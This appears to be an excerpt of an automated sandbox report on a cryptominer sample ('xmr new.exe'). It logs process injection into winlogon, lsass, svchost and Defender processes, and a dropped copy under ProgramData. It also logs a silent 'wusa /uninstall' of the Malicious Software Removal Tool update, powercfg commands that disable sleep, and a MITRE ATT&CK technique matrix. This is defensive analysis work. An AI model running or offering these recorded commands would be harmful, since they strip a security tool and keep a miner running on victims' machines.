        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A07B273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2125273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E859273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 52F2273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 90BB273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C4CC273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1F9A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1F97273C
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 1F385B90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 2A2911C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 14E255D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 283E0EF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 2A2919C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 14E25F00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 283E0F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FB53990000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F2BD130000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 229F8B70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2938BA00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2258F3D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26F54840000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22B76580000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1265E790000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 18510D30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 200A2B70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2389D0D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22E66FD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A4D6530000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20763780000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 200FF1A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23CC6130000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 266F1070000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26008BB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 12E54DA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2CF20530000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19EA6340000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: A50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC464E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 15B351A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C38C460000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DC09A40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C73F910000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1616A5B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 181C5E90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 18E3AF30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26DA05C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C9B0460000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23A7CF40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 184FCB80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\sihost.exe base: 1CF1CE30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1697C550000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F0FE010000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC093B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C8004E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ctfmon.exe base: 118D8250000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 27687590000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\explorer.exe base: B40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19292570000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 221CFED0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E7A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 15DAA130000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19605730000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87F1C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20ECB6C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 2DA0CB00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2B392000000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23F55C00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E8A07B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2E321250000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19BE8590000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 17F90BB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 230C4CC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F970000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F9A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: PID: 3504 base: B40000 value: 4D
        Source: C:\Users\user\Desktop\xmr new.exe | Thread register set: target process: 3412
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Thread register set: target process: 4196
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Thread register set: target process: 4864
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Thread register set: target process: 1532
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1F385B90000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 2A2911C0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 14E255D0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 283E0EF0000
        Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252E10000
        Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252540000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1F385BF0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 2A2919C0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 14E25F00000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 283E0F20000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FB53990000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CBD8BA0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F2BD130000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 229F8B70000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2938BA00000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2258F3D0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26F54840000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22B76580000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1265E790000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18510D30000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 200A2B70000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F33CBD0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FAB73D0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D3E96E0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2389D0D0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22E66FD0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A4D6530000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20763780000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 200FF1A0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23CC6130000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 266F1070000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26008BB0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 12E54DA0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2CF20530000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FDE9EA0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 19EA6340000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: A50000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ED5C5A0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EC464E0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15B351A0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C38C460000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DC09A40000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C73F910000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1616A5B0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181C5E90000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18E3AF30000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D70B1D0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26DA05C0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C9B0460000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23A7CF40000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 184FCB80000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 1CF1CE30000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1697C550000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F0FE010000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FC093B0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C8004E0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 118D8250000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27687590000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28FAA0B0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: B40000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 19292570000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2A31FCE0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 221CFED0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E7A0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 15DAA130000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 269FBD40000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 14A28E00000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 19605730000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87F1C0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20ECB6C0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 2DA0CB00000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2B392000000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23F55C00000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E8A07B0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2E321250000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 19BE8590000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252F20000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 17F90BB0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 230C4CC0000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F970000
        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F9A0000
        Source: C:\Users\user\Desktop\xmr new.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
        Source: C:\Windows\System32\dialer.exe | Code function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: winlogon.exe, 0000001F.00000000.1532944494.000001F386111000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.2799295771.000001F386111000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002A.00000002.2806549478.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: dwm.exe, 0000002A.00000000.1546562653.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000002.2805237393.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerS
        Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001F385BA36F0 cpuid 31_2_000001F385BA36F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001F385BC7960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,31_2_000001F385BC7960
        Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\xmr new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        MITRE ATT&CK Matrix (the number in front of a technique is the count of matching signatures)

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 2 Native API | 11 Windows Service | 1 Access Token Manipulation | 1 Obfuscated Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | Logon Script (Windows) | 11 Windows Service | 1 Install Root Certificate | Security Account Manager | 24 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 713 Process Injection | 1 DLL Side-Loading | NTDS | 331 Security Software Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Rootkit | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
